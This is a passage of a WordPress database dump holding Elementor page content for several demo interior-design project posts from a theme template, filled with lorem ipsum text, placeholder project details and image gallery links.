src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h3>our gallery</h3>\n<h2>\n								 Photo gallery</h2>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-1.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-1.jpg\" alt=\"\">\n</a>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-2.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-2.jpg\" alt=\"\">\n</a>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-3.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-3.jpg\" alt=\"\">\n</a>','Modern villa','','publish','open','closed','','modern-villa','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_projects&#038;p=613',0,'ova_projects','',0),(619,1,'2022-06-14 02:17:21','2022-06-14 02:17:21','<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\n<h2>Vintage design</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h4>Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates</h4>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\nService:\n<h4> Interior design</h4>\nArchitect:\n<h4> Mike hardson</h4>\nDuration:\n<h4> 4.5 Months</h4>\nLocation:\n<h4> Broklyn, New York</h4>\n<ul>\n 	<li>\n                        <a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n</ul>\n<h2>Before</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Challenges</h2>\n 	<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"570\" height=\"506\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h2>After</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Results</h2>\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n<img width=\"570\" height=\"506\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h3>our gallery</h3>\n<h2>\n								 Photo gallery</h2>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-1.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-1.jpg\" alt=\"\">\n</a>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-2.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-2.jpg\" alt=\"\">\n</a>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-3.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-3.jpg\" alt=\"\">\n</a>','Vintage design','','publish','open','closed','','vintage-design','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_projects&#038;p=619',0,'ova_projects','',0),(624,1,'2022-06-14 02:18:51','2022-06-14 02:18:51','<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\n<h2>Simple home</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h4>Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates</h4>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\nService:\n<h4> Interior design</h4>\nArchitect:\n<h4> Mike hardson</h4>\nDuration:\n<h4> 4.5 Months</h4>\nLocation:\n<h4> Broklyn, New York</h4>\n<ul>\n 	<li>\n                        <a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n</ul>\n<h2>Before</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Challenges</h2>\n 	<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"570\" height=\"506\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h2>After</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Results</h2>\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n<img width=\"570\" height=\"506\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h3>our gallery</h3>\n<h2>\n								 Photo gallery</h2>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-1.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-1.jpg\" alt=\"\">\n</a>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-2.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-2.jpg\" alt=\"\">\n</a>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-3.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-3.jpg\" alt=\"\">\n</a>','Simple home','','publish','open','closed','','simple-home','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_projects&#038;p=624',0,'ova_projects','',0),(629,1,'2022-06-14 02:21:05','2022-06-14 02:21:05','<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\n<h2>Luxury room</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h4>Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates</h4>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\nService:\n<h4> Interior design</h4>\nArchitect:\n<h4> Mike hardson</h4>\nDuration:\n<h4> 4.5 Months</h4>\nLocation:\n<h4> Broklyn, New York</h4>\n<ul>\n 	<li>\n                        <a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n</ul>\n<h2>Before</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Challenges</h2>\n 	<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"570\" height=\"506\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h2>After</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Results</h2>\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n<img width=\"570\" height=\"506\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h3>our gallery</h3>\n<h2>\n								 Photo gallery</h2>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-1.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-1.jpg\" alt=\"\">\n</a>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-2.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-2.jpg\" alt=\"\">\n</a>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-3.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-3.jpg\" alt=\"\">\n</a>','Luxury room','','publish','open','closed','','luxury-room','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_projects&#038;p=629',0,'ova_projects','',0),(634,1,'2022-06-14 02:22:42','2022-06-14 02:22:42','<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\n<h2>Idea interior</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h4>Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates</h4>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\nService:\n<h4> Interior design</h4>\nArchitect:\n<h4> Mike hardson</h4>\nDuration:\n<h4> 4.5 Months</h4>\nLocation:\n<h4> Broklyn, New York</h4>\n<ul>\n 	<li>\n                        <a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n</ul>\n<h2>Before</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Challenges</h2>\n 	<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"570\" height=\"506\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h2>After</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Results</h2>\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n<img width=\"570\" height=\"506\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h3>our gallery</h3>\n<h2>\n								 Photo gallery</h2>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-1.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-1.jpg\" alt=\"\">\n</a>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-2.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-2.jpg\" alt=\"\">\n</a>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-3.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-3.jpg\" alt=\"\">\n</a>','Idea interior','','publish','open','closed','','idea-interior','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_projects&#038;p=634',0,'ova_projects','',0),(639,1,'2022-06-14 02:24:34','2022-06-14 02:24:34','<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\n<h2>Buildings</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h4>Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates</h4>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\nService:\n<h4> Interior design</h4>\nArchitect:\n<h4> Mike hardson</h4>\nDuration:\n<h4> 4.5 Months</h4>\nLocation:\n<h4> Broklyn, New York</h4>\n<ul>\n 	<li>\n                        <a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n</ul>\n<h2>Before</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Challenges</h2>\n 	<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta 